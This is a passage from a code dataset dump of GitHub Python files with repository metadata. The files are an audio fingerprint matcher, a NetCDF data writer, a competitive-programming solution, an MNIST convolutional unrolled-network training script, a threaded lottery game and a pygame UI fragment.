sample_stft_dB = librosa.amplitude_to_db(np.abs(sample_stft),ref=np.max) \r\n \r\n threshold = np.amin(sample_stft_dB) * (50/100)\r\n \r\n image_max = ndi.maximum_filter(sample_stft_dB, size=5, mode='constant')\r\n peaks = peak_local_max(sample_stft_dB, min_distance=30,threshold_abs=threshold)\r\n \r\n \r\n # Extract the fingerprint of the unknown audio\r\n sample_fingerprint = hashPeaks(peaks,0)\r\n \r\n \r\n # Find the matching pairs between sample audio file and the songs in the database\r\n matchingPairs = matching_pairs(F_database, sample_fingerprint)\r\n \r\n \r\n # Identify the song\r\n songbins,offsets = best_match(song_database,matchingPairs)\r\n return song_database[np.argmax(songbins)][:-4]","repo_name":"Mamdad0u/audio_fingerprint","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"15107338373","text":"# L\r\ndef liquid_water_content(meta, mode, nc, ver):\r\n import TData_data as dat\r\n import TData_common as com\r\n import numpy as np\r\n \r\n [ET, DT, DoY] = dat.create_time(meta)\r\n [lat, lon] = dat.create_pos(ET, mode)\r\n \r\n [data_1d, flag_1d, min_dat, max_dat] = dat.create_data_flag(ET)\r\n \r\n # write common global attrib \r\n com.global_attributes(nc, meta, ET, mode)\r\n \r\n # write specific global attrib\r\n nc.product_version = ver\r\n \r\n # write common dimensions\r\n com.dimensions(nc, ET, lat, lon)\r\n \r\n # write specific dimensions\r\n \r\n # write common variables\r\n com.variables(nc, ET, DT, DoY, lat, lon, mode)\r\n \r\n # write specific variables\r\n v = nc.createVariable('cloud_liquid_water_content', np.float32, ('time',), fill_value=-1.00e+20)\r\n #variable attributes\r\n v.units = 'kg m-2'\r\n v.long_name = 'Cloud Liquid Water Content'\r\n v.valid_min = np.float32(min_dat)\r\n v.valid_max = np.float32(max_dat)\r\n v.cell_methods = 'time: mean'\r\n v.coordinates = 'latitude longitude'\r\n #write data\r\n v[:] = np.float32(data_1d) \r\n\r\n v = nc.createVariable('qc_flag', np.int8, ('time',))\r\n #variable attribute\r\n v.units = '1'\r\n v.long_name = 'Data Quality Flag'\r\n v.flag_values = '0b,1b,2b,3b,4b'\r\n v.flag_meanings = 'not_used' + '\\n'\r\n 
v.flag_meanings = v.flag_meanings + 'good_data' + '\\n'\r\n v.flag_meanings = v.flag_meanings + 'suspect_data_data_not_quality_controlled:_data<0.075' + '\\n'\r\n v.flag_meanings = v.flag_meanings + 'suspect_data_data_not_quality_controlled:_data>0.925' + '\\n'\r\n v.flag_meanings = v.flag_meanings + 'bad_data_do_not_use:_data=0' \r\n #write data\r\n v[:] = np.int8(flag_1d)\r\n \r\n del dat, com, np, data_1d, flag_1d ","repo_name":"barbarabrooks/NCAS-Data-Project-Training-Data","sub_path":"TData_products_L.py","file_name":"TData_products_L.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"41410658718","text":"for T in range(int(input())):\n N, K = map(int, input().split())\n S, numOfSeg, result = input(), N // K, ''\n total0, total1 = S.count('0'), S.count('1')\n if total1 % numOfSeg == 0 and total0 % numOfSeg == 0:\n numZero, numOne = total0 // numOfSeg, total1 // numOfSeg\n for segment in range(numOfSeg):\n if segment % 2 == 0:\n result += ('0' * numZero) + ('1' * numOne)\n else:\n result += ('1' * numOne) + ('0' * numZero)\n else:\n result = 'IMPOSSIBLE'\n print(result)\n\n'''\n2\n8 2\n00011101\n6 2\n100111\n'''\n","repo_name":"alphasingh/competitive-programming","sub_path":"codechef/cookoff/kFoldBinaryString_08_2020.py","file_name":"kFoldBinaryString_08_2020.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"29449388101","text":"import math\nfrom functools import partial\nfrom dataclasses import dataclass\nfrom typing import Optional\nfrom omegaconf import OmegaConf\nimport torch\nfrom torch.nn.modules import activation\nfrom torch.utils.data import DataLoader, random_split\nimport torchvision.transforms as transforms\nimport torchvision.datasets as dsets\nfrom torchvision.datasets import MNIST\nimport torch\nimport torchvision\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\nimport wandb\nimport random\nimport numpy as np\nimport os\nimport itertools\n\ndef reg_softmax(k): \n\n k_copy = k.clone()\n k_flat = k_copy.view(k_copy.size(0), -1)\n k_flat[k_flat == 0] = 1\n shannon_entropy = - torch.sum(((k_flat)) * torch.log(((k_flat))), dim=1)\n # shannon_entropy = shannon_entropy.view(1, -1)\n \n return - shannon_entropy\n\ndef reg_relu(k):\n # print(\"k.shape:\", k.shape)\n k_copy = k.clone()\n k_flat = k_copy.view(k_copy.size(0), -1)\n euclidean_norm = torch.norm(k_flat, dim=1)\n euclidean_norm = euclidean_norm.view(1, -1)\n \n return 0.5 * torch.square(euclidean_norm)\n\ndef reg_tanh(k):\n result_tensor = (k + 1) / 2 * torch.log((k + 1) / 2) + (k - 1) / 2 * torch.log((k - 1) / 2)\n sum_tensor = torch.sum(result_tensor, dim = (1,2,3)) # shape: [batch_size]\n return sum_tensor\n\ndef frobenius_inner_product(k1, k2):\n return torch.sum(k1 * k2, dim = (1,2,3))\n\n# def load_config(conf, show=False):\n# # conf = OmegaConf.from_cli()\n\n# # validate against schema\n# schema = OmegaConf.structured(MNISTConvConfigSchema)\n# conf = OmegaConf.merge(schema, conf)\n\n# if show:\n# print(OmegaConf.to_yaml(conf))\n\n# conf = OmegaConf.to_container(conf)\n\n# return conf\n\ndef get_x_y(batch, cuda):\n # *_, w, h = batch[0].shape\n # images = batch[0].view(-1, w * h) # between [0, 1].\n images = batch[0]\n images = 2*images - 1 # [between -1 and 1]\n labels = batch[1]\n\n if cuda:\n images = images.to(\"cuda\")\n labels = labels.to(\"cuda\")\n\n return images, 
labels\n\n\nclass ConvUNN(torch.nn.Module):\n\n\n def __init__(self, k, n_classes, activation, dropout_p=0, y_init=\"zero\", seed = 42):\n super().__init__()\n self.k = k\n self.n_classes = n_classes\n self.dropout = torch.nn.Dropout(p=dropout_p)\n self.y_init = y_init\n self.seed = seed\n self.activation = activation\n \n\n # fixed arch. lazy\n\n d0 = 28\n d1 = 6\n n1 = 32\n d2 = 4\n n2 = 64\n d3 = 5\n n3 = n_classes\n\n self.stride = 2\n\n self.n1 = n1\n self.n2 = n2\n self.n3 = n3\n self.d0 = d0\n self.d1 = d1\n self.d2 = d2\n self.d3 = d3\n\n self.h1_dim = (self.d0 - self.d1) // self.stride + 1\n self.h2_dim = (self.h1_dim - self.d2) // self.stride + 1\n\n self.W1 = torch.nn.Parameter(torch.empty(n1, 1, d1, d1))\n self.b1 = torch.nn.Parameter(torch.empty(n1))\n\n self.W2 = torch.nn.Parameter(torch.empty(n2, n1, d2, d2))\n self.b2 = torch.nn.Parameter(torch.empty(n2))\n\n self.W3 = torch.nn.Parameter(torch.empty(n3, n2 * self.h2_dim * self.h2_dim))\n self.b3 = torch.nn.Parameter(torch.empty(n3))\n\n print(\"self.W1\", self.W1.shape)\n print(\"self.b1\", self.b1.shape)\n print(\"self.W2\", self.W2.shape)\n print(\"self.b2\", self.b2.shape)\n print(\"self.W3\", self.W3.shape)\n print(\"self.b3\", self.b3.shape)\n \n torch.manual_seed(self.seed)\n\n torch.nn.init.kaiming_uniform_(self.W1, a=math.sqrt(5))\n # nonlinearity='tanh')\n torch.nn.init.kaiming_uniform_(self.W2, a=math.sqrt(5))\n # nonlinearity='tanh')\n torch.nn.init.kaiming_uniform_(self.W3, a=math.sqrt(5))\n\n fan_in_1, _ = torch.nn.init._calculate_fan_in_and_fan_out(self.W1)\n bound_1 = 1 / math.sqrt(fan_in_1)\n torch.nn.init.uniform_(self.b1, -bound_1, bound_1)\n\n fan_in_2, _ = torch.nn.init._calculate_fan_in_and_fan_out(self.W2)\n bound_2 = 1 / math.sqrt(fan_in_2)\n torch.nn.init.uniform_(self.b2, -bound_2, bound_2)\n\n fan_in_3, _ = torch.nn.init._calculate_fan_in_and_fan_out(self.W3)\n bound_3 = 1 / math.sqrt(fan_in_3)\n torch.nn.init.uniform_(self.b3, -bound_3, bound_3)\n\n\n def _update_X(self, H1):\n return torch.conv_transpose2d(H1, weight=self.W1, stride=self.stride)\n\n def _update_H1(self, X, H2, b1_stochastic):\n\n H1_fwd = torch.conv2d(X, self.W1, self.b1 + b1_stochastic, stride=self.stride)\n H1_bwd = torch.conv_transpose2d(H2, weight=self.W2, stride=self.stride)\n return H1_fwd + H1_bwd\n\n def _update_H2(self, H1, Y, b2_stochastic):\n h1_dim = (self.d0 - self.d1) // self.stride + 1\n h2_dim = (h1_dim - self.d2) // self.stride + 1\n H2_fwd = torch.conv2d(H1, self.W2, self.b2 + b2_stochastic, stride=self.stride)\n H2_bwd = (Y @ self.W3).reshape(-1, self.n2, h2_dim, h2_dim)\n return H2_fwd + H2_bwd\n\n def _update_Y(self, H2, b3_stochastic):\n # flatten\n H2_ = H2.view(H2.shape[0], -1)\n return H2_ @ self.W3.T + (self.b3 + b3_stochastic)\n\n\n def forward(self, X, b1_stochastic, b2_stochastic, b3_stochastic):\n\n h1_dim = (self.d0 - self.d1) // self.stride + 1\n h2_dim = (h1_dim - self.d2) // self.stride + 1\n\n b = X.shape[0]\n H2 = torch.zeros((b, self.n2, h2_dim, h2_dim), device=X.device)\n \n # Initialize Y according to setup\n if self.y_init == \"zero\":\n # Initialize Y with zeros by default\n Y = torch.zeros(b, self.n3, device=X.device) \n elif self.y_init == \"rand\":\n # Initialize Y as a random probability distribution\n Y = torch.rand(b, self.n3, device=X.device) \n Y = torch.softmax(Y, dim=-1)\n elif self.y_init == \"uniform\":\n # Initialize Y as a random probability distribution\n Y = torch.zeros(b, self.n3, device=X.device) \n Y = torch.softmax(Y, dim=-1)\n\n mask_H1 = torch.ones(b, self.n1, h1_dim, 
h1_dim, device=X.device)\n mask_H1 = self.dropout(mask_H1)\n\n mask_H2 = torch.ones(b, self.n2, h2_dim, h2_dim, device=X.device)\n mask_H2 = self.dropout(mask_H2)\n \n total_energy = []\n total_energy = []\n total_entropy = []\n \n for i in range(self.k):\n if i==0: # Standard training of UNN with k steps of coordinate descent\n # for _ in range(self.k):\n\n X_flattened = torch.flatten(X, 1, 3)\n \n if torch.cuda.is_available(): \n device = torch.device(\"cuda\")\n X_flattened = X_flattened.to(device)\n X = X.to(device)\n Y = Y.to(device)\n b1_stochastic = b1_stochastic.to(device)\n H2 = H2.to(device)\n else:\n device = torch.device(\"cpu\")\n X_flattened = X_flattened.to(device)\n X = X.to(device)\n Y = Y.to(device)\n b1_stochastic = b1_stochastic.to(device)\n H2 = H2.to(device)\n\n\n H1 = self._update_H1(X, H2, b1_stochastic)\n \n if self.activation == \"relu\":\n H1 = torch.relu(H1)\n elif self.activation == \"tanh\":\n H1 = torch.tanh(H1)\n \n if torch.cuda.is_available():\n device = torch.device(\"cuda\")\n mask_H1 = mask_H1.to(device)\n b2_stochastic = b2_stochastic.to(device)\n H1 = H1.to(device)\n else:\n device = torch.device(\"cpu\")\n mask_H1 = mask_H1.to(device)\n b2_stochastic = b2_stochastic.to(device)\n H1 = H1.to(device)\n\n H1 = H1 * mask_H1\n\n H2 = self._update_H2(H1, Y, b2_stochastic)\n\n if self.activation == \"relu\":\n H2 = torch.relu(H2)\n elif self.activation == \"tanh\":\n H2 = torch.tanh(H2)\n \n \n if torch.cuda.is_available():\n device = torch.device(\"cuda\")\n mask_H2 = mask_H2.to(device)\n b3_stochastic = b3_stochastic.to(device)\n H2 = H2.to(device)\n else:\n device = torch.device(\"cpu\")\n mask_H2 = mask_H2.to(device)\n b3_stochastic = b3_stochastic.to(device)\n H2 = H2.to(device)\n\n H2 = H2 * mask_H2\n\n Y_logits = self._update_Y(H2, b3_stochastic)\n Y = torch.softmax(Y_logits, dim=-1)\n \n H2 = self._update_H2(H1, Y, b2_stochastic)\n\n if self.activation == \"relu\":\n H2 = torch.relu(H2)\n elif self.activation == \"tanh\":\n H2 = torch.tanh(H2)\n \n H2 = H2 * mask_H2\n entropy = reg_softmax(Y)\n total_entropy.append(-torch.sum(entropy))\n ###### Energy Calculation´######\n\n E_X = 0.5 * (frobenius_inner_product(X, X)) #Parece ok\n if self.activation == \"relu\":\n # print(\"entrei relu\")\n E_H1 = - torch.sum((((self.b1 + b1_stochastic).view(32, 1,1) * torch.ones((12,12), device = \"cuda:0\")).view(1, 32, 12, 12)*H1),dim = (1,2,3)) + reg_relu(H1)\n E_H2 = - torch.sum((((self.b2 + b2_stochastic).view(64, 1,1) * torch.ones((5,5), device = \"cuda:0\")).view(1, 64, 5, 5)*H2),dim = (1,2,3)) + reg_relu(H2)\n elif self.activation == \"tanh\":\n # print(\"entrei tanh\")\n E_H1 = - torch.sum((((self.b1 + b1_stochastic).view(32, 1,1) * torch.ones((12,12), device = \"cuda:0\")).view(1, 32, 12, 12)*H1),dim = (1,2,3)) + 0.5 * (frobenius_inner_product(X, X))\n E_H2 = - torch.sum((((self.b2 + b2_stochastic).view(64, 1,1) * torch.ones((5,5), device = \"cuda:0\")).view(1, 64, 5, 5)*H2),dim = (1,2,3)) + 0.5 * (frobenius_inner_product(X, X))\n\n E_Y = - torch.sum(Y * (self.b3 + b3_stochastic).view(1, 10), dim=1) + reg_softmax(Y)\n\n E_XH1 = - torch.sum(torch.conv2d(X, self.W1, stride=self.stride) * H1, dim=(1, 2, 3))\n E_H1H2 = - torch.sum(torch.conv2d(H1, self.W2, stride=self.stride) * H2, dim=(1, 2, 3))\n\n energy = E_X + E_H1 + E_H2 + E_Y + E_XH1 + E_H1H2\n total_energy.append(torch.mean(energy).item())\n \n # print(\"b1_stochastic.shape:\",b1_stochastic.shape)\n # print(\"b2_stochastic.shape:\",b2_stochastic.shape)\n # 
print(\"b3_stochastic.shape:\",b3_stochastic.shape)\n\n # print(\"self.b1.shape:\",self.b1.shape)\n # print(\"self.b2.shape:\",self.b2.shape)\n # print(\"self.b3.shape:\",self.b3.shape)\n\n # print(\"E_X.shape:\",E_X.shape)\n # print(\"E_H1.shape:\",E_H1.shape)\n # print(\"E_H2.shape:\",E_H2.shape)\n # print(\"E_Y.shape:\",E_Y.shape)\n # print(\"E_XH1.shape:\",E_XH1.shape)\n # print(\"E_H1H2.shape:\",E_H1H2.shape)\n\n # print(\"torch.conv2d(X, self.W1, stride=self.stride).shape:\",torch.conv2d(X, self.W1, stride=self.stride).shape)\n # print(\"H1.shape:\",H1.shape)\n # print(\"torch.sum(conv_result * H1, dim=(1, 2, 3)):\",torch.sum(torch.conv2d(X, self.W1, stride=self.stride) * H1, dim=(1, 2, 3)).shape) \n \n # print(total_energy) \n return Y_logits, total_energy, total_entropy\n\n def backward(self, y, b1_stochastic, b2_stochastic, k=None, return_all_x=True):\n\n if k is None:\n k = self.k\n\n Y = torch.nn.functional.one_hot(y, num_classes=self.n_classes)\n b = Y.shape[0]\n\n all_X = []\n\n H1 = torch.zeros(b, self.n1, self.h1_dim, self.h1_dim, device=y.device)\n\n X = torch.zeros(b, 1, self.d0, self.d0, device=y.device)\n # X = torch.flatten(X, 1, 3)\n Y = Y.to(dtype=X.dtype)\n\n for i in range(k):\n H2 = self._update_H2(H1, Y, b2_stochastic)\n\n if self.activation == \"relu\":\n H2 = torch.relu(H2)\n elif self.activation == \"tanh\":\n H2 = torch.tanh(H2)\n\n H1 = self._update_H1(X, H2, b1_stochastic)\n \n if self.activation == \"relu\":\n H1 = torch.relu(H1)\n elif self.activation == \"tanh\":\n H1 = torch.tanh(H1)\n\n Xp = self._update_X(H1)\n if self.activation == \"relu\":\n X = torch.relu(Xp)\n elif self.activation == \"tanh\":\n X = torch.tanh(Xp)\n\n if return_all_x:\n all_X.append(X.detach().clone())\n\n H1 = self._update_H1(X, H2, b1_stochastic)\n \n if self.activation == \"relu\":\n H1 = torch.relu(H1)\n elif self.activation == \"tanh\":\n H1 = torch.tanh(H1)\n \n # if self.k > 1:\n # X = torch.flatten(X, 1, 3)\n\n # returns pre-activation (logit) X as well as matrix of all Xs.\n return Xp, all_X\n\ndef main():\n \n run = wandb.init()\n conf = run.config\n\n backward_loss_coef = conf.backward_loss_coef\n batch_size = conf.batch_size\n device = conf.device\n dropout = conf.dropout\n lr = conf.lr\n max_epochs = conf.max_epochs\n noise_mean = conf.noise_mean\n noise_sd = conf.noise_sd\n seed = conf.seed\n unn_iter = conf.unn_iter\n unn_y_init = conf.unn_y_init\n activation = conf.activation\n \n \n if torch.cuda.is_available():\n device = \"cuda\"\n\n # print(\"config.dropout:\",config.dropout)\n\n # conf = load_config(conf, show=True)\n \n # Step 1. 
Load Dataset\n train_and_dev_dataset = dsets.MNIST(root='data', train=True, transform=transforms.ToTensor(), download=True)\n test_dataset = dsets.MNIST(root='data', train=False, transform=transforms.ToTensor())\n\n n_train_and_dev = len(train_and_dev_dataset)\n n_dev = 10000\n train_dataset, dev_dataset = random_split(\n train_and_dev_dataset,\n [n_train_and_dev - n_dev, n_dev],\n generator=torch.Generator().manual_seed(42)\n )\n\n print(\"Train data\", len(train_dataset))\n print(\"Dev data\", len(dev_dataset))\n print(\"Test data\", len(test_dataset))\n\n print(\"CONF:\",conf)\n batch_size = conf['batch_size']\n _, w, h = train_dataset[0][0].shape\n input_dim = w * h\n output_dim = 10\n\n train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\n dev_loader = DataLoader(dataset=dev_dataset, batch_size=batch_size, shuffle=False)\n test_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)\n\n model = ConvUNN(k=conf['unn_iter'],\n n_classes=output_dim,\n dropout_p=conf['dropout'],\n y_init=conf['unn_y_init'],\t\n seed = conf[\"seed\"],\n activation = conf[\"activation\"]\n )\n\n if torch.cuda.is_available():\n model = model.to(\"cuda\")\n\n print(model)\n\n # optimizer = torch.optim.SGD(model.parameters(), lr=conf['lr'], momentum = 0.9)\n optimizer = torch.optim.Adam(model.parameters(), lr=conf['lr'])\n\n\n print('Num parameters:', sum(p.numel() for p in model.parameters()))\n\n # for p in model.parameters():\n # print(p.numel())\n\n for name, param in model.named_parameters():\n print(name, param.numel())\n \n noise_sd = conf[\"noise_sd\"]\n noise_mean = conf[\"noise_mean\"]\n \n train_model(model,\n train_loader,\n dev_loader,\n test_loader,\n optimizer,\n conf,\n get_x_y,\n noise_sd,\n noise_mean)\n\n run.finish()\n\n\ndef train_model(model, train_loader, dev_loader, test_loader,\n optimizer, conf, get_x_y, noise_sd, noise_mean):\n\n n_train = len(train_loader.dataset)\n\n best_val_acc = 0\n best_val_acc_test_acc = None\n best_val_acc_epoch = None\n\n # accuracy_dev = eval_model(model, dev_loader, get_x_y)\n # accuracy_test = eval_model(model, test_loader, get_x_y)\n # print(\"Before training acc\", accuracy_dev, accuracy_test)\n\n # computes softmax and then the cross entropy\n loss_fw = torch.nn.CrossEntropyLoss(reduction='none')\n loss_bw = torch.nn.BCEWithLogitsLoss(reduction='none')\n \n epochs_list = []\n loss_fw_train_list = []\n loss_bw_train_list = []\n loss_fw_val_list = []\n loss_bw_val_list = []\n loss_fw_test_list = []\n loss_bw_test_list = []\n acc_train_list = []\n acc_val_list = []\n acc_test_list = []\n noise_seeds_list = []\n\n params_shape_list = []\n for p in model.parameters():\n print(p.numel())\n params_shape_list.append(p.numel())\n\n W1_shape, b1_shape, W2_shape, b2_shape, W3_shape, b3_shape = params_shape_list\n \n fw_increases = 0\n bw_increases = 0\n \n lowest_loss_fw_val = +np.inf\n lowest_loss_bw_val = +np.inf\n\n for epoch in range(conf['max_epochs']):\n\n # generate noise and keep track\n \n # random_int = torch.randint(low=1, high=101, size=(1,)).item()\n random_int = random.randint(1, 100)\n torch.manual_seed(random_int)\n b1_stochastic = torch.randn(b1_shape)*noise_sd + noise_mean\n b2_stochastic = torch.randn(b2_shape)*noise_sd + noise_mean\n b3_stochastic = torch.randn(b3_shape)*noise_sd + noise_mean\n\n if torch.cuda.is_available():\n b1_stochastic = b1_stochastic.to(\"cuda\")\n b2_stochastic = b2_stochastic.to(\"cuda\")\n b3_stochastic = b3_stochastic.to(\"cuda\")\n\n 
noise_seeds_list.append(random_int)\n\n loss_fw_train = 0\n loss_bw_train = 0\n accuracy_train = 0\n\n loss_fw_val_total = 0 \n loss_bw_val_total = 0 \n\n for batch_id, batch in enumerate(train_loader):\n model.train()\n optimizer.zero_grad()\n\n if torch.cuda.is_available():\n cuda = torch.cuda.is_available()\n else:\n cuda = False\n\n x, y = get_x_y(batch, cuda)\n\n # [batch x n_classes]\n logits_fw, _, _aaa = model(x, b1_stochastic, b2_stochastic, b3_stochastic)\n # [batch]\n loss_val_fw = loss_fw(logits_fw, y)\n\n loss_avg = loss_val_fw.mean()\n if conf['backward_loss_coef'] > 0:\n\n # [batch x 1 x 28 x 28]\n logits_bw, _ = model.backward(y, b1_stochastic, b2_stochastic)\n # [batch x 1 x 28 x 28]\n loss_val_bw = loss_bw(logits_bw, (x>0).to(dtype=x.dtype))\n\n loss_avg = loss_avg + conf['backward_loss_coef'] * loss_val_bw.mean()\n\n loss_avg.backward()\n optimizer.step()\n\n loss_fw_train += loss_val_fw.sum().item()\n if conf['backward_loss_coef'] > 0:\n loss_bw_train += loss_val_bw.mean(dim=-1).sum().item()\n accuracy_train += (logits_fw.argmax(dim=1) == y).sum().item()\n\n accuracy_val, loss_fw_val, loss_bw_val = eval_model(model, dev_loader, get_x_y, loss_fw, loss_bw, b1_stochastic, b2_stochastic, b3_stochastic, cuda)\n accuracy_test, loss_fw_test, loss_bw_test = eval_model(model, test_loader, get_x_y, loss_fw, loss_bw, b1_stochastic, b2_stochastic, b3_stochastic, cuda)\n\n loss_val_avg = loss_fw_val + conf[\"backward_loss_coef\"]*loss_bw_val\n\n loss_fw_train /= n_train # average sample loss\n loss_bw_train /= n_train # average sample loss\n accuracy_train /= n_train\n \n # if accuracy_val > best_val_acc:\n # best_val_acc = accuracy_val\n # best_val_acc_test_acc = accuracy_test\n # best_val_acc_epoch = epoch\n \n weights_dir = os.path.join(wandb.run.dir, wandb.run.name)\n os.makedirs(weights_dir, exist_ok=True)\n\n filename = f\"{wandb.run.name}_epoch{epoch}.pt\"\n torch.save(model, os.path.join(weights_dir, filename))\n\n log = {\n 'epoch': epoch,\n 'loss_fw_train': loss_fw_train,\n 'loss_bw_train': loss_bw_train,\n 'loss_fw_val:': loss_fw_val,\n 'loss_bw_val:': loss_bw_val,\n 'loss_fw_test:': loss_fw_test,\n 'loss_bw_test:': loss_bw_test,\n 'acc_train': accuracy_train,\n 'acc_val': accuracy_val,\n 'acc_test': accuracy_test,\n 'noise_seed': random_int,\n \"loss_val_avg\": loss_val_avg\n }\n\n epochs_list.append(epoch)\n loss_fw_train_list.append(loss_fw_train)\n loss_bw_train_list.append(loss_bw_train)\n loss_fw_val_list.append(loss_fw_val)\n loss_bw_val_list.append(loss_bw_val)\n loss_fw_test_list.append(loss_fw_test)\n loss_bw_test_list.append(loss_bw_test)\n acc_train_list.append(accuracy_train)\n acc_val_list.append(accuracy_val)\n acc_test_list.append(accuracy_test)\n \n wandb.log(log)\t\t\t\t\n print(log)\n\n # Stopping Criteria\n\n if loss_fw_val < lowest_loss_fw_val:\n lowest_loss_fw_val = loss_fw_val\n fw_increases = 0\n else:\n fw_increases += 1\n\n \n if loss_bw_val < lowest_loss_bw_val:\n lowest_loss_bw_val = loss_bw_val\n bw_increases = 0\n else:\n bw_increases += 1\n \n print(\"fw_increases:\",fw_increases,\"bw_increases:\",bw_increases)\n \n if fw_increases >= 10 and bw_increases >10:\n print(\"Early stopping triggered\")\n break # Exit the training loop\n\n # Plot losses of the fw task\n plt.figure()\n plt.plot(epochs_list, loss_fw_train_list, label='Training')\n plt.plot(epochs_list, loss_fw_val_list, label='Validation')\n plt.plot(epochs_list, loss_fw_test_list, label='Test')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.title('Losses of the FW Task')\n 
plt.legend()\n plt.savefig('plot1.png')\n\n # Plot losses of the bw task\n plt.figure()\n plt.plot(epochs_list, loss_bw_train_list, label='Training')\n plt.plot(epochs_list, loss_bw_val_list, label='Validation')\n plt.plot(epochs_list, loss_bw_test_list, label='Test')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.title('Losses of the BW Task')\n plt.legend()\n plt.savefig('plot2.png')\n\n # Plot accuracies\n plt.figure()\n plt.plot(epochs_list, acc_train_list, label='Training')\n plt.plot(epochs_list, acc_val_list, label='Validation')\n plt.plot(epochs_list, acc_test_list, label='Test')\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.title('Accuracies')\n plt.legend()\n plt.savefig('plot3.png')\n\ndef eval_model(model, test_loader, get_x_y, loss_fw, loss_bw, b1_stochastic, b2_stochastic, b3_stochastic, cuda):\n correct = 0\n total = len(test_loader.dataset)\n loss_fw_train = 0\n loss_bw_train = 0\n model.eval() \n with torch.no_grad():\n for batch_id, batch in enumerate(test_loader):\n\n x, y = get_x_y(batch, cuda)\n if torch.cuda.is_available(): \n x = x.to(\"cuda\")\n y = y.to(\"cuda\")\n outputs, _, _ = model.forward(x, b1_stochastic, b2_stochastic, b3_stochastic)\n predicted = outputs.argmax(dim=1)\n # print(predicted.device)\n # print(y.device)\n correct += (predicted == y).sum().item()\n\n logits_bw, _ = model.backward(y, b1_stochastic, b2_stochastic)\n loss_val_bw = loss_bw(logits_bw, (x>0).to(dtype=x.dtype))\n loss_bw_train += loss_val_bw.mean(dim=-1).sum().item()\n\n loss_val_fw = loss_fw(outputs, y)\n loss_avg = loss_val_fw.mean()\n loss_fw_train += loss_val_fw.sum().item()\n\n accuracy = correct/total\n fw_loss = loss_fw_train/total\n bw_loss = loss_bw_train/total\n return accuracy, fw_loss, bw_loss\n\nif __name__ == '__main__':\n main()","repo_name":"ricardosimoes00/Thesis","sub_path":"Code/mnist_conv_stochastic.py","file_name":"mnist_conv_stochastic.py","file_ext":"py","file_size_in_byte":24315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23625858213","text":"\"\"\"\n相比04更改如下:\n\n1、一次性行输入玩家信息,\n2、系统自动完成多线程的玩家抽奖\n\"\"\"\n\n\nimport random\nimport time \nimport threading\n\nclass Game(object):\n \"\"\"游戏类,记录显示最高分\"\"\"\n \n #最高得分记录\n g_score = 0\n g_name = None\n player_num = 0\n\n #静态函数,游戏帮助\n @staticmethod\n def show_help():\n print(\"这是一个中奖游戏,玩法很简单。\\n1、先逐一输入玩家姓名和抽奖次数;\\n2、等待系统给您抽奖,公布分数。\\n3、注意玩家姓名输入exit时结束输入。\\n现在您可以开始输入玩家信息了。\") \n time.sleep(1)\n print(\"*\" * 50)\n\n\n #类函数,显示最高得分\n @classmethod\n def show_score(cls):\n if cls.g_name is None:\n print(\"游戏还没有人玩过。\")\n else:\n print(\"本次游戏一共有%d人参与,游戏最高分是由【%s】获得的【%d】\" %\n (cls.player_num, cls.g_name,cls.g_score))\n \n \n @classmethod\n def game_over(cls):\n \n print(\"-\" * 40)\n print(\"\")\n print(\"让我们看看最后的得分情况:\")\n cls.show_score()\n time.sleep(1)\n print(\"game over!\")\n\n\n def __init__(self,name):\n self.p_name = name\n self.p_score = 0\n Game.player_num += 1\n\n def open_score(self):\n now_score = random.randint(1,101)\n\n if now_score > Game.g_score:\n if Game.g_name is None: \n print(\"恭喜【%s】以【%d】的高分,抢得第一次游戏最高记录\" %\n (self.p_name, now_score))\n else:\n print(\"恭喜【%s】以【%d】的高分,超过【%s】【%d】的历史最高分,创造新的记录\" %\n (self.p_name, now_score, Game.g_name, Game.g_score))\n Game.g_score = now_score\n Game.g_name = self.p_name\n #Game.show_score()\n #time.sleep(1)\n else:\n print(\"恭喜【%s】,获得【%d】分,还未打破记录\" % (self.p_name,\n now_score))\n time.sleep(1)\n \ndef get_score(p_name,num):\n g1 = Game(p_name)\n print(\"欢迎第%d个玩家【%s】加入游戏\" % (Game.player_num, 
p_name))\n time.sleep(random.random())\n\n i = 0\n while i < num:\n g1.open_score()\n i += 1\n print(\"玩家【%s】已完成次%d抽奖.\" % (p_name, num))\n\n\ndef get_games():\n\n t_games = list()\n while True:\n p_name = input(\"请输入玩家的名字:\")\n if p_name == \"exit\":\n print(\"玩家入场完毕,抽奖开始!\")\n time.sleep(1)\n break\n try:\n num = int(input(\"请输入玩家抽奖次数,最多9次:\"))\n if num < 1 or num > 9:\n print(\"您输入数字不在1-9之间,系统自动改为5次!\")\n num = 5\n except:\n print(\"您输入的非数字,系统自动改为5次!\")\n num = 5\n t = threading.Thread(target=get_score, args=(p_name, num))\n t_games.append(t)\n return t_games\n\n \ndef main():\n\n #显示游戏帮助\n Game.show_help()\n time.sleep(1)\n \n #获取玩家信息\n t_games = get_games()\n\n #开启所有玩家抽奖\n for t_game in t_games:\n t_game.start()\n \n #等待所有抽奖结束\n for t_game in t_games:\n t_game.join()\n\n #显示游戏结束信息\n Game.game_over()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"qumogu/pystudy","sub_path":"1-3/07game05.py","file_name":"07game05.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14308486380","text":"import pygame\n\n\nclass MyUI:\n def __init__(self):\n self.UISurface = pygame.Surface(pygame.display.get_surface().get_size())\n self.UISurface.set_colorkey((0, 0, 0))\n self.KapitelLogo = pygame.image.load(\"UI/Hauptmenu.png\")\n self.Szene = \"\"\n pygame.font.init()\n self.Schriften = pygame.font.SysFont('Comic Sam', 30)\n self.SzenenTitel = \"\"\n\n def KapitelLaden(self, name):\n self.KapitelLogo = 